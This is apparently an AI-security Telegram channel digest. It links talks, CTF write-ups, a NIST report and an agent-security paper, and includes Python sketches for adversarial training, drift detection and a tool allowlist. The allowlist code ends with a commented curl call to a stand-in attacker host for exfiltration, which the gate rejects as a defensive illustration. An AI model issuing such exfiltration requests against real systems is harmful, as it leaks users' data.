AISecHub – Telegram
https://linktr.ee/aisechub managed by AISecHub. Sponsored by: innovguard.com

Top AI Security YouTube Videos — November 2025 - https://youtube.com/playlist?list=PLFO56KBxdGBeXiLJ8JHxGliXzXZNq-f-x

This playlist collects more than 30 new AI security talks from SAINTCON, Black Hat, BSides, NorthSec, Hack In The Box, LABScon, DevCon, DjangoCon, and Everything Open across November 2025. Sessions explore AI-driven cyber attacks, agentic workflows and MCP abuse, jailbreak tactics and guardrail failures, LLM-enabled malware and offensive tooling, AI disinformation operations, secure adoption of LLMs in FinTech and cloud, and practical lessons from real-world research and incident response.

https://medium.com/ai-security-hub/top-ai-security-youtube-videos-november-2025-5f09db69ca42
Assessing Risks and Impacts of AI (ARIA).pdf
7.7 MB
Assessing Risks and Impacts of AI (ARIA) - NIST

Source: https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.700-2.pdf
📌 Components of MLSecOps

🔹 Model Hardening
Strengthen models with adversarial training and reduce vulnerability to attacks (a minimal sketch follows this list).

🔹 Dataset Integrity & Validation
Detect poisoned data, validate distributions, and identify anomalies in input.

🔹 Data Security & Governance
Protect training data, enforce access control, and manage sensitive information securely.

🔹 MLOps Integration
Ensure continuous security testing, CI/CD protection, and safe ML deployments.

🔹 Supply Chain Security
Secure model files and dependencies, and detect malicious or tampered libraries.

🔹 Audit, Compliance & Logging
Track model changes, maintain audit trails, and meet regulatory requirements.

🔹 Model Explainability & Transparency
Understand model decisions, detect bias, and ensure responsible model behavior.

🔹 Secure Deployment & Serving
Enforce authentication, protect inference endpoints, and run encrypted model serving.

🔹 Model Monitoring & Drift Detection
Detect drift, anomalies, degradation, and emerging risks in real time (see the second sketch after this list).

🔹 Threat Detection & Attack Prevention
Identify extraction attempts, inversion attacks, prompt injection, and API abuse.

(By Shalini Goyal)
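
To ground the first item, here is a minimal adversarial-training sketch in PyTorch. It is illustrative only: `model`, `loader`, and `optimizer` are assumed to be a standard image classifier, data loader, and optimizer, with inputs in [0, 1]. Each batch is perturbed with FGSM and the model trains on a 50/50 mix of clean and adversarial loss.

```python
import torch
import torch.nn.functional as F

def fgsm_perturb(model, x, y, epsilon=0.03):
    """Craft FGSM adversarial examples: one signed-gradient step on the input."""
    x_adv = x.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(x_adv), y)
    loss.backward()
    # Step in the direction that increases the loss, then clamp back to the
    # assumed [0, 1] input range.
    x_adv = x_adv + epsilon * x_adv.grad.sign()
    return x_adv.clamp(0, 1).detach()

def adversarial_training_epoch(model, loader, optimizer, epsilon=0.03):
    """One epoch of mixed clean/adversarial training (50/50 loss weighting)."""
    model.train()
    for x, y in loader:
        x_adv = fgsm_perturb(model, x, y, epsilon)
        optimizer.zero_grad()  # clears gradients left over from crafting x_adv
        loss = 0.5 * F.cross_entropy(model(x), y) \
             + 0.5 * F.cross_entropy(model(x_adv), y)
        loss.backward()
        optimizer.step()
```

FGSM is the cheapest perturbation (a single gradient step); PGD, which takes several smaller projected steps, is the usual stronger choice for serious hardening.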
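
And for the monitoring item, a minimal drift-detection sketch using SciPy: it flags features whose live distribution diverges from a training-time reference under a two-sample Kolmogorov-Smirnov test. The data and the alpha threshold here are hypothetical.

```python
import numpy as np
from scipy.stats import ks_2samp

def detect_drift(reference, live, alpha=0.01):
    """Return indices of features whose live values drifted from the reference.

    reference: (n_ref, n_features) array of values seen at training time
    live:      (n_live, n_features) array of recent production values
    A feature is flagged when the two-sample KS p-value falls below alpha.
    """
    drifted = []
    for i in range(reference.shape[1]):
        _statistic, p_value = ks_2samp(reference[:, i], live[:, i])
        if p_value < alpha:
            drifted.append(i)
    return drifted

# Synthetic check: feature 1 shifts in "production" and should be flagged.
rng = np.random.default_rng(0)
ref = rng.normal(0.0, 1.0, size=(5000, 3))
prod = rng.normal(0.0, 1.0, size=(1000, 3))
prod[:, 1] += 0.5  # simulated mean shift on one feature
print(detect_drift(ref, prod))  # expected output: [1]
```

In production this would run on rolling windows and route flagged features to alerting or retraining; the KS test is univariate, so multivariate drift needs per-feature tests with a correction, or a dedicated detector.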
Neurogrid CTF: The Ultimate AI Security Showdown - Agent of 0ca / BoxPwnr Write-up

On November 20-24, 2025, I participated with BoxPwnr in Neurogrid CTF, the first AI-only CTF competition hosted by Hack The Box, with $50k in AI credits for the top 3 teams. This wasn't a typical CTF where humans solve challenges; instead, AI agents competed autonomously in a hyper-realistic cyber arena. My autonomous agent secured 5th place, solving 38/45 flags (84.4% completion) across 36 challenges without any manual intervention.

https://0ca.github.io/ctf/ai/security/2025/11/28/neurogrid-ctf-writeup.html
HeliosBank LLM CTF Series - LLM DFIR CTF

Each incident simulates a real-world AI-driven compromise inside HeliosBank's internal systems.

https://eliwoodward.github.io/LLM_CTF/
AI agents find $4.6M in blockchain smart contract exploits

https://red.anthropic.com/2025/smart-contracts/
AISecHub pinned «AI Security Newsletter - November 2025 https://www.linkedin.com/posts/adgnji_aisecurity-adversarialai-redteamai-activity-7401545671746740225-L9Xt?»
🧰 raptor - Raptor turns Claude Code into a general-purpose offensive/defensive AI security agent. Through CLAUDE.md plus custom rules, sub-agents, and skills, it configures the agent for adversarial thinking and performs research or attack/defense operations. ⭐️ 124 https://github.com/gadievron/raptor
Security research in the age of AI tools

In this article, I show how my work as a security researcher has changed and how new AI tools have impacted my workflow, productivity, and overall approach to security research. I present two vulnerabilities discovered by other researchers, show how I investigated them to create security checks for our Invicti DAST product, and describe how AI tools helped me in the process.

https://invicti.com/blog/security-labs/security-research-in-the-age-of-ai-tools
Systems Security Foundations for Agentic Computing - https://arxiv.org/pdf/2512.01295

This paper articulates short- and long-term research problems in AI agent security and privacy through the lens of computer systems security. This approach examines the end-to-end security properties of entire systems rather than AI models in isolation. While hardening a single model is useful, it is often not enough: by way of analogy, creating a model that is always helpful and harmless is akin to creating software that is always correct and secure.

The collective experience of decades of cybersecurity research and practice shows that this is insufficient. Rather, constructing an informed and realistic attacker model before building a system, applying hard-earned lessons from software security, and continuously improving security posture is the tried-and-tested approach to securing real computer systems. A key goal is to examine where research challenges arise when applying traditional security principles in the context of AI agents.

A secondary goal of this report is to distill these ideas for AI and ML practitioners and researchers. We discuss the challenges of applying security principles to agentic computing, present 11 case studies of real attacks on agentic systems, and define a series of new research problems specific to the security of agentic systems.
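
To give a flavor of these systems-level lessons applied to agents, here is a minimal sketch of a least-privilege tool gate (all names and validators are hypothetical, not from the paper): the agent can only reach tools through an allowlist that validates arguments before anything executes, so a prompt-injected instruction cannot invoke arbitrary capabilities.

```python
import subprocess

# Hypothetical allowlist: tool name -> argument validator. Anything not
# listed here is unreachable by the agent, however it is prompted.
ALLOWED_TOOLS = {
    "read_file": lambda path: path.startswith("/workspace/") and ".." not in path,
    "nslookup": lambda host: host.replace("-", "").replace(".", "").isalnum(),
}

def run_tool(name, arg):
    """Execute an agent-requested tool only if it passes the allowlist gate."""
    validator = ALLOWED_TOOLS.get(name)
    if validator is None:
        raise PermissionError(f"tool not in allowlist: {name}")
    if not validator(arg):
        raise ValueError(f"argument rejected for {name}: {arg!r}")
    if name == "read_file":
        with open(arg, encoding="utf-8") as f:
            return f.read()
    # External commands run without a shell, so arguments cannot smuggle in
    # shell syntax; a timeout bounds the blast radius of a hung tool.
    return subprocess.run(
        [name, arg], capture_output=True, text=True, timeout=10, check=True
    ).stdout

# A prompt-injected request for an unlisted capability fails closed:
# run_tool("curl", "http://attacker.example/exfil")  -> PermissionError
```

The point mirrors the paper's framing: the security property (no arbitrary exfiltration channel) is enforced by the surrounding system, not by hoping the model refuses the request.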